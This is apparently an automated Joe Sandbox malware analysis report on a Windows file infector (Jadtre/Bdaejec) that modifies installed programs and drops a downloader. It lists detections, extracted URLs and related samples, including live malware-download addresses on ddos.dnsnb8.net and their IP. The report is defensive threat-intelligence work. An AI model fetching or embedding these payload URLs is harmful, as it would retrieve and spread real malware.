    windows-stand
    SourceDetectionScannerLabelLink
    8VB4lVuZk3.exe100%AviraW32/Jadtre.B
    8VB4lVuZk3.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\XFAGWZ.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\XFAGWZ.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.scintilla.org/scite.rng0%URL Reputationsafe
    http://www.activestate.comHolger0%URL Reputationsafe
    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
    http://www.baanboard.comBrendon0%URL Reputationsafe
    https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe
    https://www.smartsharesystems.com/0%URL Reputationsafe
    http://www.scintilla.org0%URL Reputationsafe
    http://www.openssl.org/support/faq.html0%URL Reputationsafe
    http://www.develop.com0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
    http://www.spaceblue.com0%URL Reputationsafe
    http://www.baanboard.com0%URL Reputationsafe
    http://www.develop.comDeepak0%URL Reputationsafe
    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
    http://www.rftp.comJosiah0%URL Reputationsafe
    http://www.activestate.com0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    http://count.jimstone.com.cn/api/v1/countSite?api_version=1.0SELECT0%Avira URL Cloudsafe
    http://www.rftp.com0%URL Reputationsafe
    http://www.jimstone.com.cn/refresh0%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/scalperEquityOrder/queryPool0%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/user/getPublicKeyuserNo=data0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarX(3100%Avira URL Cloudphishing
    http://vipapi.chadanwang.com/scalperEquityOrder/fetchOrder0%Avira URL Cloudsafe
    http://www.spaceblue.comMathias0%URL Reputationsafe
    https://www.smartsharesystems.com/Morten0%URL Reputationsafe
    http://ddos.dnsnb8.net/;100%Avira URL Cloudphishing
    http://www.jimstone.com.cn/english/0%Avira URL Cloudsafe
    http://www.lua.org0%URL Reputationsafe
    http://www.jimstone.com.cn/Location0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net/100%URL Reputationmalware
    http://eb.jimstone.com.cn0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
    http://www.jimstone.com.cn/english/Referer0%Avira URL Cloudsafe
    http://count.jimstone.com.cn/api/v1/countSite?api_version=1.00%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/soap/http0%Avira URL Cloudsafe
    http://e2ee.jimstone.com.cn;http://e2ee.jimstone.com.cn:8000;http://e2ee2.jimstone.com.cn:8000;http:0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl/soap/0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl/rpc/0%Avira URL Cloudsafe
    http://127.0.0.1:8984/solr/e2ee0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarJ100%Avira URL Cloudmalware
    http://e2eeE.com:84430%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/disco/scl/0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarX100%Avira URL Cloudmalware
    http://www.baidu.com0%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/user/login&shareCode=&loginPwd=data.remarkerrorMsg50%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/scalperEquityOrder/fetchOrder&JSESSIONID=orderId=errorCode2000%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/user/getPublicKey0%Avira URL Cloudsafe
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net/XK100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar=zP100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarp100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rard100%Avira URL Cloudmalware
    http://vipapi.chadanwang.com/scalperEquityOrder/queryPoolpageNum=1&pageSize=10&brand=4&JSESSIONID=da0%Avira URL Cloudsafe
    http://e2ee.jimstone.com.cn0%Avira URL Cloudsafe
    http://www.w3school.com.cn/cssref/css_selectors.asp0%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/user/userInfo0%Avira URL Cloudsafe
    http://e2ee.jimstone.com.cn/0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl/soap12/0%Avira URL Cloudsafe
    http://127.0.0.1/list0%Avira URL Cloudsafe
    http://e2ee.jimstone.com.cninformationen_US0%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/user/login0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl/http/0%Avira URL Cloudsafe
    http://www.jimstone.com.cn/0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl-instance/0%Avira URL Cloudsafe
    http://vipapi.chadanwang.com/scalperEquityOrder/checkNewOrder0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/disco/soap/0%Avira URL Cloudsafe
    http://www.w3school.com.cn/json/json_syntax.asp0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl-extensions/wrpchttp://schemas.xmlsoap.org/wsdl/rpc/soaphttp://schema0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl-extensions/0%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/soap/envelope/xmlns:soapsoap:Bodyxmlns%Y-%m-%dT%H:%M:%S%02d:000%Avira URL Cloudsafe
    http://schemas.xmlsoap.org/wsdl/mime/0%Avira URL Cloudsafe
    http://www.jimstone.com.cn/e2ee/docs/0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k2.rartrue
      • URL Reputation: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • URL Reputation: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://count.jimstone.com.cn/api/v1/countSite?api_version=1.0SELECT8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarX(3XFAGWZ.exe, 00000001.00000002.1892621904.0000000001209000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://vipapi.chadanwang.com/scalperEquityOrder/queryPool8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://www.activestate.comHolgerSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://eb.jimstone.com.cn8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/soap/envelope/E2EECore.2.7.2.dll.0.drfalse
      • URL Reputation: safe
      unknown
      http://vipapi.chadanwang.com/scalperEquityOrder/fetchOrder8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://www.jimstone.com.cn/Location8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.jimstone.com.cn/refresh8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://vipapi.chadanwang.com/user/getPublicKeyuserNo=data8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net/;XFAGWZ.exe, 00000001.00000003.1696071280.00000000011A5000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://www.jimstone.com.cn/english/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.baanboard.comBrendonSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      https://curl.haxx.se/docs/http-cookies.html8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • URL Reputation: safe
      unknown
      https://www.smartsharesystems.com/SciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/soap/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.scintilla.orgSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.openssl.org/support/faq.htmlE2EECore.2.7.2.dll.0.drfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/soap/httpE2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.jimstone.com.cn/english/Referer8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://count.jimstone.com.cn/api/v1/countSite?api_version=1.08VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.develop.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/rpc/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.spaceblue.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://e2ee.jimstone.com.cn;http://e2ee.jimstone.com.cn:8000;http://e2ee2.jimstone.com.cn:8000;http:E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarJXFAGWZ.exe, 00000001.00000002.1892621904.00000000011C9000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.baanboard.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.develop.comDeepakSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://127.0.0.1:8984/solr/e2ee8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/disco/scl/E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://e2eeE.com:84438VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarXXFAGWZ.exe, 00000001.00000002.1892621904.00000000011C9000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.baidu.comE2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://vipapi.chadanwang.com/user/login&shareCode=&loginPwd=data.remarkerrorMsg58VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/soap/encoding/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comJosiahSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.activestate.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://vipapi.chadanwang.com/user/getPublicKey8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://vipapi.chadanwang.com/scalperEquityOrder/fetchOrder&JSESSIONID=orderId=errorCode2008VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEXFAGWZ.exe, 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmp, XFAGWZ.exe, 00000001.00000003.1685039072.0000000000F90000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net/XKXFAGWZ.exe, 00000001.00000003.1696071280.00000000011A5000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar=zPXFAGWZ.exe, 00000001.00000002.1892621904.000000000116E000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://upx.sf.netAmcache.hve.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rardXFAGWZ.exe, 00000001.00000002.1892621904.0000000001209000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarpXFAGWZ.exe, 00000001.00000002.1893600310.0000000002BFA000.00000004.00000010.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://vipapi.chadanwang.com/scalperEquityOrder/queryPoolpageNum=1&pageSize=10&brand=4&JSESSIONID=da8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://e2ee.jimstone.com.cnE2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.w3school.com.cn/cssref/css_selectors.asp8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://vipapi.chadanwang.com/user/userInfo8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://e2ee.jimstone.com.cn/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/soap12/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://e2ee.jimstone.com.cninformationen_US8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://vipapi.chadanwang.com/user/login8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://www.lua.orgSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://127.0.0.1/list8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl-instance/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/http/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.jimstone.com.cn/E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net/XFAGWZ.exe, 00000001.00000003.1696071280.00000000011A5000.00000004.00000020.00020000.00000000.sdmptrue
      • URL Reputation: malware
      unknown
      http://schemas.xmlsoap.org/disco/soap/E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/E2EECore.2.7.2.dll.0.drfalse
      • URL Reputation: safe
      unknown
      http://vipapi.chadanwang.com/scalperEquityOrder/checkNewOrder8VB4lVuZk3.exefalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl-extensions/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl-extensions/wrpchttp://schemas.xmlsoap.org/wsdl/rpc/soaphttp://schema8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.w3school.com.cn/json/json_syntax.asp8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/soap/envelope/xmlns:soapsoap:Bodyxmlns%Y-%m-%dT%H:%M:%S%02d:008VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.jimstone.com.cn/e2ee/docs/E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/mime/8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarcC:XFAGWZ.exe, 00000001.00000003.1696181458.00000000011E9000.00000004.00000020.00020000.00000000.sdmptrue
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        44.221.84.105
        ddos.dnsnb8.netUnited States
        14618AMAZON-AESUSfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1480762
        Start date and time:2024-07-24 23:48:09 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 7s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:10
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:8VB4lVuZk3.exe
        renamed because original name is a hash value
        Original Sample Name:BF6EE92CF97D4193943CD99DE27B17C4DBD27885CC0A3152B32D2CD97CFFB873.exe
        Detection:MAL
        Classification:mal100.spre.troj.evad.winEXE@5/12@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 13.89.179.12
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: 8VB4lVuZk3.exe
        TimeTypeDescription
        17:49:22API Interceptor1x Sleep call for process: WerFault.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        44.221.84.105BA5D78636F5079947FFFE161153EBFC9DC2D3241351A788216E59A18C51A8674.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        BC508271FF66CEC5515C8527BF4766AAC1A0135F093E3F1462074D98AE8FC41F.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        B94111B51BBEE14A1C2612F7DCCD1F4EC112656645B77E65DE613421FA0E457D.exeGet hashmaliciousBdaejec, RaccoonBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        B981A1B3DB85E9AE44A79F66ECBCED67088BDA1089FE799D0BCB8DC7C7882B59.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • ddos.dnsnb8.net:799/cj//k5.rar
        B6B6783CEB1F14E70D6A9A22E1D9F133F65F9C7E700DE82FC7621A2926E3A4B7.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • ddos.dnsnb8.net:799/cj//k5.rar
        Among Us.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        B7A8BE8DE5848A8212159E2D4E79C0D97BED04272AEA99ABC19C39281F49C835.exeGet hashmaliciousBdaejec, SageBrowse
        • ddos.dnsnb8.net:799/cj//k1.rar
        Andromeda Builder.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        b6f90f3c2a3ee2ba6791c9c15670964e370639b531481a294e7b89d800e1ca40.exeGet hashmaliciousBdaejec, BlackMoonBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        B7529C27C65C9F3CD9DDCE5C6C8C193D258E8F54D8C11E9DB618FEEC3CB9258B.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • ddos.dnsnb8.net:799/cj//k5.rar
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ddos.dnsnb8.netBA5D78636F5079947FFFE161153EBFC9DC2D3241351A788216E59A18C51A8674.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        BC508271FF66CEC5515C8527BF4766AAC1A0135F093E3F1462074D98AE8FC41F.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        B94111B51BBEE14A1C2612F7DCCD1F4EC112656645B77E65DE613421FA0E457D.exeGet hashmaliciousBdaejec, RaccoonBrowse
        • 44.221.84.105
        B981A1B3DB85E9AE44A79F66ECBCED67088BDA1089FE799D0BCB8DC7C7882B59.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • 44.221.84.105
        B6B6783CEB1F14E70D6A9A22E1D9F133F65F9C7E700DE82FC7621A2926E3A4B7.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • 44.221.84.105
        Among Us.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        B7A8BE8DE5848A8212159E2D4E79C0D97BED04272AEA99ABC19C39281F49C835.exeGet hashmaliciousBdaejec, SageBrowse
        • 44.221.84.105
        Andromeda Builder.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        b6f90f3c2a3ee2ba6791c9c15670964e370639b531481a294e7b89d800e1ca40.exeGet hashmaliciousBdaejec, BlackMoonBrowse
        • 44.221.84.105
        B7529C27C65C9F3CD9DDCE5C6C8C193D258E8F54D8C11E9DB618FEEC3CB9258B.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • 44.221.84.105
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AMAZON-AESUSBA5D78636F5079947FFFE161153EBFC9DC2D3241351A788216E59A18C51A8674.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        BC508271FF66CEC5515C8527BF4766AAC1A0135F093E3F1462074D98AE8FC41F.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        B94111B51BBEE14A1C2612F7DCCD1F4EC112656645B77E65DE613421FA0E457D.exeGet hashmaliciousBdaejec, RaccoonBrowse
        • 44.221.84.105
        B981A1B3DB85E9AE44A79F66ECBCED67088BDA1089FE799D0BCB8DC7C7882B59.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • 44.221.84.105
        B6B6783CEB1F14E70D6A9A22E1D9F133F65F9C7E700DE82FC7621A2926E3A4B7.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • 44.221.84.105
        Among Us.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        Andromeda Builder.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        b6f90f3c2a3ee2ba6791c9c15670964e370639b531481a294e7b89d800e1ca40.exeGet hashmaliciousBdaejec, BlackMoonBrowse
        • 44.221.84.105
        http://links-sg.dispatch.me/ls/click?upn=u001.ocQe0-2BgliqpF-2FIgZypM8KOaLflKjBlvqTxtPZw5yZIbZDE9vmulRwrCjHKmWRDNHjHXGC5bjX16p-2FKQbudETcReyH2ada0TDTZ9i4Fm9kQ3GWUyvzzwMCdcEUqs-2FTSCobKxgzuisHVBsQ-2FSQ3F13H5HutCQALtWrS8HApt5o4dpZ-2BNvuOuxFwx-2BeObsn6VjvT5TqPLkexi4iH5KEJi8Cdw-3D-3DATrr_-2F-2F-2B-2FxnH7VwZ7l1bJN-2FhVOPk1U24fPXiT0lCeCqmBBxzunHzzBZhASjEPhdfcYmgfhvKPgbmfCcNO0asuCAP4GQjxIDFltQt0zztHT0pZkzXqKtFgdxgdlGrzT0WJ21THn3P5UyhAiKGRx3slicqJyrWBw4wmTjosxdLpPvzT9mOZ9tFtj-2FYpdJbLEVcqfFG3PWdvMJHnhRGcQ-2BjkZifTwg-3D-3DGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
        • 54.87.89.151
        B7529C27C65C9F3CD9DDCE5C6C8C193D258E8F54D8C11E9DB618FEEC3CB9258B.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
        • 44.221.84.105
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
